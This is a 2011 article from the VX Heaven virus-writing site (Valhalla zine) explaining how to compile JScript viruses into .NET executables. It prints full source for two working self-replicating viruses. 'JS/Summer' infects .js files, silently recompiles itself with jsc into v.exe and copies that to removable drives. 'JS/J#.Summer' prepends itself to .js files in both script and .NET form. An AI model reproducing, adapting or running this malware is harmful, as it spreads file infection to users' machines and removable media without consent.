Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Hidden in .NET

hh86
Valhalla #1
August 2011

1
[Back to index] [Comments]

.NET Compilers

Microsoft decided to include compilers along with the .NET framework that is available pretty much in every computer of the world running Windows. Compilers include one for JScript .NET. So, we can compile our JScript virus source into .NET assembly. Imagine you have polymorphic JScript virus, it is transformed to MSIL code, what is the result? One great .NET assembly that looks very different than previous one, so in each computer you can generate multiple polymorphic or even more complex instances of the virus running and spreading as exe file.

This is much more powerful technique than using JS2EXE tools. ;) Since now you can infect files and recompile yourself!

How hidden?

Source code will be encoded as UTF-16LE string (no BOM present because every string is stored in this format). They are stored in the MetaData section. When running, it will use the VSA Engine to run our script. This looks like an easy way to host and run the script, however, this gets as complex as the source code is. One of the problems for me was to make a JScript file infector, how was I going to retrieve my source code? After some examination I found this, and I knew reflections must be available. JScript always had its reflection system (in part, because of the Function() object, we can create a function to be in a variable), so we don't need to open our own file and get the code, really.

How we do it

We just need access to .NET Framework directory "Microsoft .NET\Framework". The detail here is there will be multiple versions of the framework. I choose to go using the last one, 4.0.

Here is my virus JS/Summer, must be single-line, run carefully: it spreads to fixed drives if possible.

g();function g(){;f=new ActiveXObject("Scripting.FileSystemObject");
n=f.GetSpecialFolder(0)+"\\Microsoft.NET\\Framework\\v4.0.30319\\";
c="g();"+g;v="v=[]";for(i=0;i<c.length;i++){v=v+
";v.push(\"\\x"+c.substr(i,1).charCodeAt(0).toString(16)+"\")"}
v=v+c.substr(17,51)+"s=f.CreateTextFile(\"v.js\",2);v=v.join(\"\");
s.Write(v);s.Close()"
;for(y=new Enumerator(f.getfolder(".").files);
!y.atEnd();y.moveNext()){x=y.item();if(f.GetExtensionName(x).toLowerCase()==
"js"){try{b=f.OpenTextFile(x);k=b.Read(4);if(k!=c.substr(0,4)){h=b.ReadAll();
b.Close();p=x.Attributes;x.Attributes=0;l=f.CreateTextFile(x);l.Write(c+";"+
k+h);l.Close();x.Attributes=p}}catch(e){}}}s=f.CreateTextFile(n+"v",2);
s.Write(v);s.Close();w=new ActiveXObject("WScript.Shell").Run("cmd /k cd "+
n+"&jsc /t:winexe /fast- v&exit",0,1);for(y=new Enumerator(f.Drives);
!y.atEnd();y.moveNext()){u=y.item();if(u.DriveType==1){v="v.exe";
f.CopyFile(n+v,u+"\\"+v)}}}
 

JS .NET virus

I thought to make an interesting cross-infector. However, we cannot know when file is certainly JScript or JScript .NET. Known bug is we cannot include the "import System;import System.IO" we require for JScript .NET. :(

Here is though, JS/J#.Summer:

g();function g()
{

    /*access source code in #US when in .NET assembly*/

    var u="g();"+g+"\r\n";

    try
    {
        s=GC                                 //but it was a trick and the clock struck 12
    }
    catch(e)
    {
        var f=new ActiveXObject("Scripting.FileSystemObject");
        for(y=new Enumerator(f.getfolder(".").files);!y.atEnd();y.moveNext())
        {
            var x=y.item();
            if(f.GetExtensionName(x).toLowerCase()=="js")
            {
                try
                {
                    var b=f.OpenTextFile(x);var h=b.ReadAll();b.Close();
                    if(h.substr(0,4)!="g();")
                    {
                        var p=x.Attributes;x.Attributes=0;
                                var l=f.CreateTextFile(x);l.Write(u+h);
                                l.Close();x.Attributes=p
                    }
                }
                catch(e)
                {}
            }
        }
        return
    }

    /*MSIL code now*/
    var w,s=Object();
    var y=Directory.GetFiles(Directory.GetCurrentDirectory(),"*.js");
    for(var x in y)
    {
        x=y[x].ToString();
        try
        {
            s=new StreamReader(x);var c=s.ReadToEnd();s.Close();
            if(c.substr(0,4)!="g();")
            {
                var a=File.GetAttributes(x);File.SetAttributes(x,0);
                        w=new StreamWriter(x);w.Write(u+c);w.Close();
                        File.SetAttributes(x,a)
            }
        }
        catch(e)
        {}
    }
}
 
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua